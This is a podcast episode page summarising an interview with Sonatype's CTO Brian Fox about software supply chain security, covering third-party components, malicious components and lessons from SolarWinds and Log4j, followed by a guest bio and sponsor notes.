Securing the Supply Chain… for Software With Brian Fox, Co-Founder, SVP and CTO

Play episode

“In the Struts case with Equifax, everybody was talking about, ‘Well, the attacks started within the first week of the disclosure.’ The Log4J one — It started within days. You don’t even have days. You don’t have minutes when you’re dealing with a malicious component.”


If companies don’t truly know the elements in their products, then they are set up for trouble. According to Brian Fox, Co-Founder, SVP and CTO of Sonatype, without this knowledge they won’t know how to address issues or if bad actors have infiltrated their products with disruptive parts. Brian advises that all aspects in the supply chain for software must be identified and secured just like any physical product.


Key Insights

The Illusion of Building Alone (02:21)

Humans often over-exaggerate individual accomplishments. No one person is self-made. The same thing is true for the vast majority of products that are created. Products are typically put together from many different, already existing parts. Fox describes this reality in software development. 

So the modern application, and this has been true for 10, 15 years at this point is composed of about 90% third-party components. Most of those are going to be open source. So your developers in this decade are not writing a hundred percent of the code.” 

Learning From Other Industries (35:57)

It’s natural to be hyper-focused on one’s own industry; especially if one has a passion for it. But there’s so much that can be learned from other industries. Fox suggests that the software industry can learn from other industries regarding how to oversee supply chains.

“And we don’t have to reinvent the wheel. Industries before us have this solved, right? Food can be recalled and traced [and] auto manufacturers can do it. The planes we get on can do it. We just have to follow the same patterns. it’s not actually that hard. What’s hard is getting people to see what they don’t see at the time.” 

The Problem With “Malicious Components” (23:25)

Fox uses a term called “malicious components” which refers to parts of a software product that have been planted to cause some sort of harm. A parallel example would be someone in the physical space who sneaks a product part into production to do damage. Fox raises the point for consideration: If one doesn’t know the sabotage has happened, then it will not be stopped.

 “If you have a traditional application security portfolio or program that is trying to scan and assess things before you put it into production [and] before you ship it to customers, okay, that’s important. You should do that, but it completely is going to miss all the malicious components that are happening on the developer-side.”

Hardship Can be Great Teacher (34:15) 

“Human nature is not to act until we’re kind of forced in many cases.” 


Fox suggests that SolarWinds and Log4j have been wake-up calls concerning the supply chain for the software industry. It’s often unfortunate that it takes great difficulty for humans to change. On the other hand, it’s good to learn from mistakes, or even unexpected troubles, and adjust accordingly. In fast, doing so, speaks well of human resilience.


About the Guest:

“Co-founder and CTO, Brian Fox is a member of the Apache Software Foundation and former Chair of the Apache Maven project. As a direct contributor to the Maven ecosystem, including the maven-dependency-plugin and maven-enforcer-plugin, he has over 20 years of experience driving the vision behind, as well as developing and leading the development of software for organizations ranging from startups to large enterprises. Brian is a frequent speaker at national and regional events including Java User Groups and other development related conferences.”

IT Visionaries is brought to you by The Salesforce Platform. If you love the thought leadership on this podcast, Salesforce has even more meaty IT thoughts to chew on. Take your company to the next level with in-depth research and trends right in your inbox. Subscribe to a newsletter tailored to your role at Salesforce.com/newsletter.

Mission.org is a media studio producing content for world-class clients. Learn more at mission.org.


Episode 360